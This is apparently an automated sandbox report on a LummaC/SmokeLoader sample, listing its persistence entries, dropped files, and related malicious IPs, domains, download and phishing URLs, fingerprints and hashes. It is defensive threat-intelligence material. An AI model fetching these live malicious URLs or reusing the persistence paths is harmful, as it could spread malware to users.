Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:43:00	API Interceptor	281011x Sleep call for process: explorer.exe modified
01:44:23	API Interceptor	43x Sleep call for process: powershell.exe modified
01:44:26	API Interceptor	6x Sleep call for process: BitLockerToGo.exe modified
01:44:34	API Interceptor	7x Sleep call for process: lm.exe modified
01:44:42	API Interceptor	1x Sleep call for process: 2D42.exe modified
01:45:15	API Interceptor	2x Sleep call for process: WerFault.exe modified
06:43:18	Task Scheduler	Run new task: Firefox Default Browser Agent 6CA12A7CD217364A path: C:\Users\user\AppData\Roaming\adjijwj
06:44:35	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs
06:45:09	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Update#5685_8yUscnjrUY C:\Users\user\AppData\Local\Temp\8EC7.exe
06:45:18	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Update#5685_8yUscnjrUY C:\Users\user\AppData\Local\Temp\8EC7.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
77.221.157.163	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	77.221.157.163/systemd.exe
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	77.221.157.163/systemd.exe
	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	77.221.157.163/systemd.exe
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	Nodf3hIUrK.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	uue9O7WXRA.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
107.173.160.139	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
	win.exe	Get hash	malicious	Unknown	Browse
	win.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse
	Nodf3hIUrK.exe	Get hash	malicious	SmokeLoader	Browse
107.173.160.137	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
	win.exe	Get hash	malicious	Unknown	Browse
	win.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse
	Nodf3hIUrK.exe	Get hash	malicious	SmokeLoader	Browse
172.67.213.85	1lKbb2hF7fYToopfpmEvlyRN.exe	Get hash	malicious	LummaC, Vidar	Browse
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
	hOYGfIcBVf.exe	Get hash	malicious	LummaC, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mzxn.ru	file.exe	Get hash	malicious	SmokeLoader	Browse	211.181.24.133
mzxn.ru	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	186.145.236.93
funrecipebooks.com	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	162.0.235.84
funrecipebooks.com	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	162.0.235.84
liernessfornicsa.shop	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	172.67.213.85
	1lKbb2hF7fYToopfpmEvlyRN.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.213.85
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	172.67.213.85
	1qlzPN3oeX.exe	Get hash	malicious	LummaC	Browse	104.21.77.246
	hOYGfIcBVf.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.213.85
store4.gofile.io	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	31.14.70.245
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	31.14.70.245
	w85VkFOxiD.exe	Get hash	malicious	Python Stealer, CStealer, NiceRAT, Quasar	Browse	31.14.70.245
	9afaXJv52z.exe	Get hash	malicious	Exela Stealer	Browse	31.14.70.245
	NoBackend.exe	Get hash	malicious	Unknown	Browse	31.14.70.245
	Microsoft_Teams_SC.ba#.bat	Get hash	malicious	Unknown	Browse	31.14.70.245
	c0PZAXHMCpdh5F1.exe	Get hash	malicious	Clipboard Hijacker, Redline Clipper, Stealerium	Browse	31.14.70.245
	5a7TEjoYQp.exe	Get hash	malicious	Xmrig	Browse	31.14.70.245
	wins9c8hG6.exe	Get hash	malicious	Raccoon Stealer v2, Xmrig	Browse	31.14.70.245
	GameInject.exe	Get hash	malicious	Xmrig	Browse	31.14.70.245
rentry.co	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	104.26.3.16
	allchecker.exe	Get hash	malicious	Python Stealer, CStealer	Browse	172.67.75.40
	QMe7JpPtde.exe	Get hash	malicious	Unknown	Browse	104.26.2.16
	cliente.exe	Get hash	malicious	Unknown	Browse	172.67.75.40
	S982i1J0Uk.msi	Get hash	malicious	Unknown	Browse	104.26.3.16
	cliente.exe	Get hash	malicious	Unknown	Browse	104.26.3.16
	8998BC9FAF52DAB072698E932593819BFD772EE5C0C4519F30ECD55DE363505A.exe	Get hash	malicious	Bdaejec	Browse	104.26.3.16
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	104.26.3.16
	Adobe-GenP.exe	Get hash	malicious	Unknown	Browse	104.26.2.16
	updater.exe	Get hash	malicious	Xmrig	Browse	172.67.75.40

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
INFOBOX-ASInfoboxruAutonomousSystemRU	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	77.221.157.163
	file.exe	Get hash	malicious	Unknown	Browse	109.120.137.52
	s6K4JjTwtz.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	IrJIw2lsaB.msi	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	ptuNVk3HeK.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	Qnwce6AQX2.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	cLi4FZejpP.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	uf0VrlE1bR.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	v9A2nFGtMJ.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	XaEvV3DPc7.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	188.114.96.3
	https://www.kudoboard.com/boards/ZWwsi9jg	Get hash	malicious	Unknown	Browse	172.67.37.149
	NsCTgrwBjQ.exe	Get hash	malicious	Unknown	Browse	172.67.177.136
	NsCTgrwBjQ.exe	Get hash	malicious	Unknown	Browse	172.67.177.136
	https://forms.office.com/r/Rv9K1pC66n	Get hash	malicious	Unknown	Browse	104.17.112.233
	https://f522my.fi79.fdske.com/ec/gAAAAABmpB7T0a5uPS5ojzr4t_T3OUm-FdnelJXDBC1VoV6m2V3L_fPLJYD_I4iovDAQynFwUxenvGcRNh2X00urBe5-4u-rT9GnyUh1X4xs-bp1jFgbdnQWjG990ZIV-3jiRSF6xm2yQVII0IUZNMTwe6xA7L7bXWw_begThms8P6liFgUdG6VQSYwrbqAxhU2UEyqaypup8CoqX1XTXX22SapdlozSl3U2FuKV8U9lz4_YoWYvXaj9erwugsbbIzwuyoMgDRxdh9iJQFak65dYgkq2tGXY1LV-S0k2sDgZf7wEDr63jmpMQO3SzqMfQA3mGK6zccUXpwE0i3r8hj5z4np9jw5lE8Wcp6N7QIvI_qpBMTJqfmuaZZdQ5LOQYKgqx2tl9eUzVwZBUsvbcRUHD4gPhSo47eQGLiImSy0uueaOd9GD5v-xXSggcJV4oiu3m7MRPADdbsVfsrtFilW1dPy_5ezRxo0JN8be1WWGWOeTVzt3fK4=	Get hash	malicious	Unknown	Browse	104.16.117.116
	http://cache.netflix.com.sg5.wuush.us.kg/	Get hash	malicious	Unknown	Browse	172.67.179.201
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	104.21.72.96
	http://investors.spotify.com.th.wuush.us.kg/	Get hash	malicious	Unknown	Browse	172.67.179.201
	http://investors.spotify.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	172.67.179.201
AS-COLOCROSSINGUS	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	107.173.160.137
	jjjUC5ggb2nQMb1B6SvBkwmT.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	23.94.183.150
	WIwTo1UTMq.elf	Get hash	malicious	Mirai	Browse	104.168.36.68
	172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.3.101.142
	1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.210.214.9
	IFqsFpijFt.rtf	Get hash	malicious	Remcos	Browse	198.46.176.133
	girlfrnd.doc	Get hash	malicious	GuLoader, Remcos	Browse	104.168.45.34
	erthings.doc	Get hash	malicious	Remcos	Browse	192.3.101.142
	girlfrnd.doc	Get hash	malicious	Remcos	Browse	198.46.176.133
	PRZELEW BANKOWY.xls	Get hash	malicious	Unknown	Browse	192.227.225.166
AS-COLOCROSSINGUS	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	107.173.160.137
	jjjUC5ggb2nQMb1B6SvBkwmT.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	23.94.183.150
	WIwTo1UTMq.elf	Get hash	malicious	Mirai	Browse	104.168.36.68
	172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.3.101.142
	1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.210.214.9
	IFqsFpijFt.rtf	Get hash	malicious	Remcos	Browse	198.46.176.133
	girlfrnd.doc	Get hash	malicious	GuLoader, Remcos	Browse	104.168.45.34
	erthings.doc	Get hash	malicious	Remcos	Browse	192.3.101.142
	girlfrnd.doc	Get hash	malicious	Remcos	Browse	198.46.176.133
	PRZELEW BANKOWY.xls	Get hash	malicious	Unknown	Browse	192.227.225.166

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a6c95ef2da5b759f65c60665167952ee	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	win.exe	Get hash	malicious	Unknown	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	win.exe	Get hash	malicious	Unknown	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	file.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
1138de370e523e824bbca92d049a3777	https://busines-support-faceboock.cfd/contract/61558775282504	Get hash	malicious	Unknown	Browse	172.67.213.85
	http://foodnetworkcookingprogramvontest.blogspot.com/?m=1	Get hash	malicious	Unknown	Browse	172.67.213.85
	https://muscletherapytec.com/wp-admin/bvn2/sprom2/popular/4e3ca076003281dc76236e73f1cc5142	Get hash	malicious	Unknown	Browse	172.67.213.85
	http://www.linktr.ee/debank.notification	Get hash	malicious	Unknown	Browse	172.67.213.85
	http://pancake-swap-alpha-mu.vercel.app/	Get hash	malicious	Unknown	Browse	172.67.213.85
	https://49moleraur.xyz/garanti	Get hash	malicious	Unknown	Browse	172.67.213.85
	https://muscletherapytec.com/wp-admin/bvn2/sprom2/popular/e5ea942a18732b1311810dd2e55b146b/	Get hash	malicious	Unknown	Browse	172.67.213.85
	https://muscletherapytec.com/wp-admin/bvn2/sprom2/popular/17f299cc4b87de0e07a1fdc16d0d9e99/	Get hash	malicious	Unknown	Browse	172.67.213.85
	http://pub-6647379952cc4cd3b00315a747c57534.r2.dev/hostyyzx.html	Get hash	malicious	Unknown	Browse	172.67.213.85
	http://apple.bot426.com/	Get hash	malicious	Unknown	Browse	172.67.213.85
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	104.26.2.16 31.14.70.245
	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	104.26.2.16 31.14.70.245
	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	104.26.2.16 31.14.70.245
	engine.ps1	Get hash	malicious	Unknown	Browse	104.26.2.16 31.14.70.245
	invoker.ps1	Get hash	malicious	Unknown	Browse	104.26.2.16 31.14.70.245
	tgmes.ps1	Get hash	malicious	Unknown	Browse	104.26.2.16 31.14.70.245
	x.ps1	Get hash	malicious	Unknown	Browse	104.26.2.16 31.14.70.245
	invoker.ps1	Get hash	malicious	Unknown	Browse	104.26.2.16 31.14.70.245
	locker.ps1	Get hash	malicious	TrojanRansom	Browse	104.26.2.16 31.14.70.245
	CCdaw0qbbo.exe	Get hash	malicious	RedLine	Browse	104.26.2.16 31.14.70.245
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84
	NsCTgrwBjQ.exe	Get hash	malicious	Unknown	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84
	NsCTgrwBjQ.exe	Get hash	malicious	Unknown	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84
	Launcher.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84
	github_softwares_v1.18.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84
	1lKbb2hF7fYToopfpmEvlyRN.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84
	pn24_065.docx.doc	Get hash	malicious	Unknown	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84
	PRZELEW BANKOWY.xls	Get hash	malicious	Unknown	Browse	188.114.97.3 185.149.100.242 172.67.213.85 162.0.235.84

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\8EC7.exe	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
C:\Users\user\AppData\Local\Temp\EF14.exe	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse
C:\Users\user\AppData\Local\Temp\2D42.exe	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse
C:\Users\user\AppData\Local\Temp\2D42.exe	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_lm.exe_ed6b1a814e4ec1e6e89791b3995c66bc9bb83_5fe582ea_8fc838e2-163f-4116-9bba-412c9028ec49\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0176257112402753
Encrypted:	false
SSDEEP:	192:WwTEXc4V0BU/y3nj/kH6jzuiFCZ24IO8qbR:/TEM42BU/gj7zuiFCY4IO8g
MD5:	9D1434AC591E006415F7AD1914DC11C8
SHA1:	EF2B384A8623D942104B802E1E9149B0B7A2A144
SHA-256:	64B3AC47D72258A4843177D4BF6625211C797A3932F27540AD83F957539D8CB4
SHA-512:	DAD95AAB23D37F0A25171D7A1ADFEDC4F611239391B519F258F285F4DB5641F870962860DAB18433106B5BFFDE7A6A33F860E3848E3D6BF9C4CABBCB473E43AE
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.5.3.2.6.9.8.0.3.5.8.7.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.5.3.2.6.9.8.5.8.2.7.6.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.f.c.8.3.8.e.2.-.1.6.3.f.-.4.1.1.6.-.9.b.b.a.-.4.1.2.c.9.0.2.8.e.c.4.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.7.4.4.d.7.7.-.4.f.5.0.-.4.2.0.8.-.8.f.d.2.-.2.e.c.b.b.3.f.f.0.3.4.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.G.2.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.5.c.-.0.0.0.1.-.0.0.1.4.-.5.5.e.2.-.c.9.0.d.e.8.d.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.d.8.6.d.5.e.1.c.a.7.e.a.4.a.a.7.3.3.7.8.1.e.5.d.d.7.e.4.f.a.3.0.0.0.0.0.9.0.4.!.0.0.0.0.d.c.c.2.d.c.b.2.6.c.1.6.4.9.8.8.7.f.1.d.5.a.e.5.5.7.a.0.0.0.b.5.f.e.3.4.b.b.9.8.!.l.m...e.x.e...

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_vm.exe_12b9a62f7c411e90f74ee59af3dcf249dad3f7e8_19c5d0bb_9c16da23-e6dd-4840-9566-709d498b9789\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0579307706778696
Encrypted:	false
SSDEEP:	192:y6998Vi0BU/4j7etlm7zuiFCZ24IO8qY:5/8VpBU/4jslczuiFCY4IO8V
MD5:	23433B571CCB77062CF34FF88374E0ED
SHA1:	FA4CA255ABCDF285CAFEBD271F98F6EE7AF4C8F5
SHA-256:	9B0CA54870D051336E183C0AAC0D1CA6364D86384EE0300DE7544B9AC3FA8687
SHA-512:	AF3283CF0E71275AB7B980D7B8BDD3CB7FEFBA035CD4B578B847AA1F06B4D697C4A967DF6F5BBACAA68EE12202F91D76532691D4BEC84D99CC85D854024A3E13
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.5.3.2.6.9.1.1.7.9.6.8.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.5.3.2.6.9.2.0.0.5.5.8.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.c.1.6.d.a.2.3.-.e.6.d.d.-.4.8.4.0.-.9.5.6.6.-.7.0.9.d.4.9.8.b.9.7.8.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.8.e.7.c.0.4.c.-.b.1.2.6.-.4.0.1.1.-.a.2.b.1.-.b.5.d.0.4.9.9.9.1.0.e.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.G.2.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.d.4.-.0.0.0.1.-.0.0.1.4.-.4.0.1.2.-.f.2.1.5.e.8.d.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.d.8.6.d.5.e.1.c.a.7.e.a.4.a.a.7.3.3.7.8.1.e.5.d.d.7.e.4.f.a.3.0.0.0.0.0.9.0.4.!.0.0.0.0.d.c.c.2.d.c.b.2.6.c.1.6.4.9.8.8.7.f.1.d.5.a.e.5.5.7.a.0.0.0.b.5.f.e.3.4.b.b.9.8.!.v.m...e.x.e...

C:\ProgramData\Microsoft\Windows\WER\Temp\WER250C.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Jul 27 05:44:51 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	252723
Entropy (8bit):	3.6812784105922507
Encrypted:	false
SSDEEP:	1536:FaM4KU/oAuBojR8apN4uE2aOoSVXEuF9LTg+oB9AmnHw5CDTetTH7pBEttfDTghc:F3tUwk8c4uEqoy/9LTg/Bb7TIga4UK
MD5:	95A3A02EDE7636CD55F2F10FE8909F1F
SHA1:	992CBCE0AB0DE695CFCA730A61A8398CBFDA8562
SHA-256:	8E9B3657DCD42175C03CB10633A190685D95E5C37A245CFA3FAC8E53D3B1A355
SHA-512:	87F5D068227C643562583AF33E688ACE5B3D98AE0B98977BE0F51C8384AF49C3B93949632BC33345679566DE9A034A1975AF8D2BB6EC36F2C64031E0B6807FE5
Malicious:	false
Preview:	MDMP..a..... .......S..f........................8................T..........T.......8...........T........... ,............... ..........."..............................................................................eJ......h#......GenuineIntel............T...........M..f............................. ..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER26A3.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6316
Entropy (8bit):	3.7256174200043675
Encrypted:	false
SSDEEP:	192:R6l7wVeJYji6pVz59YOJprD89b9jsf3fm:R6lXJx6f59YOg9Ifu
MD5:	D0E375A6685FC84D05A770EDDAE0B06A
SHA1:	D1BBB4DE6A35B6FC9B5027BAD485E7210764EC0F
SHA-256:	AA9ED39D5C9A039845222ADD6227F2113FB60CE97D1F94FB80FD177CE416AD31
SHA-512:	4503494A5088CE02A77EC005F4699674766B79D199E189B3140229A8DB3DC2AFA9E0297E713A16B9D4246958B7E782E7AC715C86FFA98AC372CF0307EFF63196
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER26D3.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4646
Entropy (8bit):	4.46744107463404
Encrypted:	false
SSDEEP:	48:cvIwWl8zsoJg77aI9l/WWpW8VYwYm8M4JlD0qFw+q8t1o9yo43Cgd:uIjfuI7n/37VwJla26yo4Sgd
MD5:	BF509FD401D7BE45F08E4375F9D79ACA
SHA1:	2EE22D5D8855DAE73ED84B0A50525D39D35B9DAF
SHA-256:	07DD90AFB0A6F6524854E5441BCEAA37FF19711F48FFE04B6F37A9E981FF1859
SHA-512:	0CEFC8B4A44DC1E50C9930C7C930DB0B71BC7EA151E5F1ADD21307E4BE040758070F37BB99A6ABB641B466DA8CED242CBB9A82E42A2B50FA30A140D6CCA05165
Malicious:	false
